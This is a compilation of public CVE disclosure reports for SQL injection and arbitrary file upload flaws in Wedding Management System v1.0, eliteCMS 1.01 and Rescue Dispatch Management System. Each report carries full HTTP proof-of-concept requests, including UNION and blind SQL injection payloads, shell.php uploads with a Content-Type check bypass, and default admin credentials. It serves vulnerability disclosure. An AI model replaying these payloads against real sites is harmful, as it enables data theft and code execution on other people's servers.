Wedding Management System v1.0 is vulnerable to SQL Injection via admin\client_assign.php.

Permalink

Cannot retrieve contributors at this time

**Wedding Management System v1.0 by codeastr.com has SQL injection**

vendors: https://codeastro.com/wedding-management-system-in-php-with-source-code/

Vulnerability File: \\admin\\client\_assign.php

Vulnerability location: /Wedding-Management/admin/client\_assign.php?booking=, booking

\[+\] Payload: booking=-31%20union%20select%201,2,3,4,5,database(),7,8--+

dbname = dbwedding

GET /Wedding\-Management/admin/client\_assign.php?booking\=\-31%20union%20select%201,2,3,4,5,database(),7,8\--+&user\_id=31 HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=0m2td1md252hlnr3nsbmc5ss99
Connection: close

CVE-2022-30826: bug_report/SQLi-3.md at main · k0xx11/bug_report

Wedding Management System v1.0 is vulnerable to SQL Injection via \admin\photos_edit.php.

**Wedding Management System v1.0 by codeastr.com has SQL injection**

vendors: https://codeastro.com/wedding-management-system-in-php-with-source-code/

Vulnerability File: \\admin\\photos\_edit.php

Vulnerability location: /Wedding-Management/admin/photos\_edit.php?id=, id

\[+\] Payload: id=-37%20union%20select%201,2,database(),4,5,6,7,8,9,10--+

dbname = dbwedding

GET /Wedding\-Management/admin/photos\_edit.php?id\=\-37%20union%20select%201,2,database(),4,5,6,7,8,9,10\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=0m2td1md252hlnr3nsbmc5ss99
Connection: close

CVE-2022-30828: bug_report/SQLi-6.md at main · k0xx11/bug_report

Wedding Management System v1.0 is vulnerable to SQL Injection via \admin\package_edit.php.

Permalink

**Wedding Management System v1.0 by codeastr.com has SQL injection**

vendors: https://codeastro.com/wedding-management-system-in-php-with-source-code/

Vulnerability File: \\admin\\package\_edit.php

Vulnerability location: /Wedding-Management/admin/package\_edit.php?id=, id

\[+\] Payload: id=-1%20union%20select%201,2,database(),4--+

dbname = dbwedding

GET /Wedding\-Management/admin/package\_edit.php?id\=\-1%20union%20select%201,2,database(),4\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=0m2td1md252hlnr3nsbmc5ss99
Connection: close

CVE-2022-30827: bug_report/SQLi-4.md at main · k0xx11/bug_report

In Afian Filerun 20220202 Changing the "search_tika_path" variable to a custom (and previously uploaded) jar file results in remote code execution in the context of the webserver user.

CVE-2022-30470: FileRun - Selfhosted File Manager with Sharing and Backup for Photos, Docs & More

In Wedding Management System v1.0, there is an arbitrary file upload vulnerability in the picture upload point of "users_profile.php" file.

Permalink

Cannot retrieve contributors at this time

**Wedding Management System v1.0 by codeastr.com has arbitrary code execution (RCE)**

vendor: https://codeastro.com/wedding-management-system-in-php-with-source-code/

Vulnerability url: http://ip/Wedding-Management/admin/users\_profile.php

Loophole location：The editing function of "Liam moore" module in the background management system-- > there is an arbitrary file upload vulnerability (RCE) in the picture upload point of "users\_profile.php" file.

Click "Edit My Account" to save

Request package for file upload：

POST /Wedding\-Management/admin/users\_profile.php HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.19/Wedding-Management/admin/users\_profile.php
Cookie: PHPSESSID=0m2td1md252hlnr3nsbmc5ss99
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------270312135209
Content-Length: 1045
\-----------------------------270312135209
Content-Disposition: form-data; name="profile\_picture"; filename="shell.php"
Content-Type: application/octet-stream
JFJF
<?php phpinfo();?>
\-----------------------------270312135209
Content-Disposition: form-data; name="firstname"
Liam
\-----------------------------270312135209
Content-Disposition: form-data; name="lastname"
Moore
\-----------------------------270312135209
Content-Disposition: form-data; name="email"
admin@mail.com
\-----------------------------270312135209
Content-Disposition: form-data; name="username"
adminliam
\-----------------------------270312135209
Content-Disposition: form-data; name="gender"
m
\-----------------------------270312135209
Content-Disposition: form-data; name="address"
Grand Meadows
\-----------------------------270312135209
Content-Disposition: form-data; name="designation"
0
\-----------------------------270312135209
Content-Disposition: form-data; name="submit"
\-----------------------------270312135209--

The files will be uploaded to this directory \\admin\\upload\\users\\

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-30822: bug_report/RCE-5.md at main · k0xx11/bug_report

In Wedding Management v1.0, there is an arbitrary file upload vulnerability in the picture upload point of "users_edit.php" file.

Permalink

Cannot retrieve contributors at this time

**Wedding Management System v1.0 by codeastr.com has arbitrary code execution (RCE)**

vendor: https://codeastro.com/wedding-management-system-in-php-with-source-code/

Vulnerability url: http://ip/Wedding-Management/admin/users\_edit.php?id=8

Loophole location：The editing function of "User Management" module in the background management system-- > there is an arbitrary file upload vulnerability (RCE) in the picture upload point of "users\_edit.php" file.

Click "Edit User" to save

Request package for file upload：

POST /Wedding\-Management/admin/users\_edit.php?id\=8 HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.19/Wedding-Management/admin/users\_edit.php?id=8
Cookie: PHPSESSID=0m2td1md252hlnr3nsbmc5ss99
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------11784258372980
Content-Length: 1069
\-----------------------------11784258372980
Content-Disposition: form-data; name="submit"
\-----------------------------11784258372980
Content-Disposition: form-data; name="profile\_picture"; filename="shell.php"
Content-Type: application/octet-stream
JFJF
<?php phpinfo();?>
\-----------------------------11784258372980
Content-Disposition: form-data; name="firstname"
Pharell
\-----------------------------11784258372980
Content-Disposition: form-data; name="lastname"
Colin
\-----------------------------11784258372980
Content-Disposition: form-data; name="email"
pharell@mail.com
\-----------------------------11784258372980
Content-Disposition: form-data; name="username"
pcolin
\-----------------------------11784258372980
Content-Disposition: form-data; name="gender"
m
\-----------------------------11784258372980
Content-Disposition: form-data; name="address"
115 Test Street
\-----------------------------11784258372980
Content-Disposition: form-data; name="designation"
1
\-----------------------------11784258372980--

The files will be uploaded to this directory \\admin\\upload\\users\\

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-30820: bug_report/RCE-4.md at main · k0xx11/bug_report

In Wedding Management System v1.0, the editing function of the "Services" module in the background management system has an arbitrary file upload vulnerability in the picture upload point of "package_edit.php" file.

Permalink

Cannot retrieve contributors at this time

**Wedding Management System v1.0 by codeastr.com has arbitrary code execution (RCE)**

vendor: https://codeastro.com/wedding-management-system-in-php-with-source-code/

Vulnerability url: http://ip/Wedding-Management/admin/package\_edit.php?id=1

Loophole location：The editing function of "Services" module in the background management system-- > there is an arbitrary file upload vulnerability (RCE) in the picture upload point of "package\_edit.php" file.

Click "Edit" to save

Request package for file upload：

POST /Wedding\-Management/admin/package\_edit.php?id\=1 HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.19/Wedding-Management/admin/package\_edit.php?id=1
Cookie: PHPSESSID=0m2td1md252hlnr3nsbmc5ss99
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------28704520716321
Content-Length: 534
\-----------------------------28704520716321
Content-Disposition: form-data; name="wedding\_type"
2
\-----------------------------28704520716321
Content-Disposition: form-data; name="price"
0.00
\-----------------------------28704520716321
Content-Disposition: form-data; name="preview\_image"; filename="shell.php"
Content-Type: application/octet-stream
JFJF
<?php phpinfo();?>
\-----------------------------28704520716321
Content-Disposition: form-data; name="submit"
\-----------------------------28704520716321--

The files will be uploaded to this directory \\admin\\upload\\categories\\

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-30821: bug_report/RCE-2.md at main · k0xx11/bug_report

elitecms 1.0.1 is vulnerable to Arbitrary code execution via admin/manage_uploads.php.

Permalink

**Elitecms v1.01 by elitecms has arbitrary code execution (RCE)**

vendor: https://elitecms.net/download.php

Vulnerability url: http://ip/eliteCMS1.01/admin/manage\_uploads.php

Loophole location： Arbitrary file upload vulnerability (RCE) exists in the "manage\_uploads" module in the background management system.

**The key point is "Content-Type: image/". We successfully bypass the detection of the image using "image/".**

Request package for file upload：

POST /eliteCMS1.01/admin/manage\_uploads.php HTTP/1.1
Host: 192.168.1.108
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.108/eliteCMS1.01/admin/manage\_uploads.php
Cookie: PHPSESSID=307ef75a2f3ab4c1103d8a1e90cf120e
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------4519189897082
Content-Length: 311
\-----------------------------4519189897082
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: image/ 
JFJF
<?php phpinfo();?>
\-----------------------------4519189897082
Content-Disposition: form-data; name="submit"
Add Image
\-----------------------------4519189897082--

The files will be uploaded to this directory \\elitecms1.01\\uploads\\

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-30808: bug_report/RCE-1.md at main · k0xx11/bug_report

Rescue Dispatch Management System v1.0 is vulnerable to SQL Injection via rdms/admin/respondent_types/view_respondent_type.php?id=.

**Rescue Dispatch Management System v1.0 by oretnom23 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/15296/rescue-dispatch-management-system-phpoop-free-source-code.html

Vulnerability File: rdms/admin/respondent\_types/view\_respondent\_type.php?id=

Vulnerability location: /rdms/admin/respondent\_types/view\_respondent\_type.php?id=,id

\[+\] Payload: /rdms/admin/respondent\_types/view\_respondent\_type.php?id=1%27%20and%20length(database())%20=7--+ // Leak place ---> id

Current database name: rdms\_db,length is 7

GET /rdms/admin/respondent\_types/view\_respondent\_type.php?id\=1%27%20and%20length(database())%20\=7\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=hkbchcmaitn0d8enhm4jtdjk9q
Connection: close

When length (database ()) = 6, Content-Length: 799 

When length (database ()) = 7, Content-Length: 653

CVE-2022-31964: bug_report/SQLi-11.md at main · k0xx11/bug_report

Wedding Management System v1.0 is vulnerable to SQL Injection via \admin\client_edit.php.

Permalink

Cannot retrieve contributors at this time

**Wedding Management System v1.0 by codeastr.com has SQL injection**

vendors: https://codeastro.com/wedding-management-system-in-php-with-source-code/

Vulnerability File: \\admin\\client\_edit.php

Vulnerability location: /Wedding-Management/admin/client\_edit.php?booking=, booking

\[+\] Payload: booking=-31%20union%20select%201,2,3,4,5,user(),7,8--+

dbname = dbwedding

GET /Wedding\-Management/admin/client\_edit.php?booking\=\-31%20union%20select%201,2,3,4,5,user(),7,8\--+&user\_id=31 HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=0m2td1md252hlnr3nsbmc5ss99
Connection: close

Tag

#firefox